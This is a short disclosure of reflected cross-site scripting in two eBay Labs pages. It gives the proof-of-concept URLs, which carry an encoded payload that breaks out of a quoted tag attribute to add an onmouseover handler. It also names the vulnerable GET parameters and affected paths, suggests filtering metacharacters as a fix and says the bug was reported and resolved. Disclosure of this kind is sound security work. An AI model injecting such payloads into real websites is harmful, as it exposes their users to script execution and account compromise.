1st one- http://labs.ebay.com/erl/demoto/to- add=lp&origtitle=Mr.&qy=%27%20onmouseover%3dprompt %281337%29%20bad%3d%27&skipk=20&sq=pop&title=Mr.
2nd one- http://labs.ebay.com/publications/-wpa-paged=2&wpa- sort=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22
Attack Details:URL encoded GET input qy was set to ' onmouseover=prompt(1337) bad='
The input is reflected inside a tag parameter between single quotes.
Affected items: /erl/demoto/to & /publications/
How to fix this vulnerability: Your script should filter metacharacters from user input.
This bug is reported to ebay and resolved now.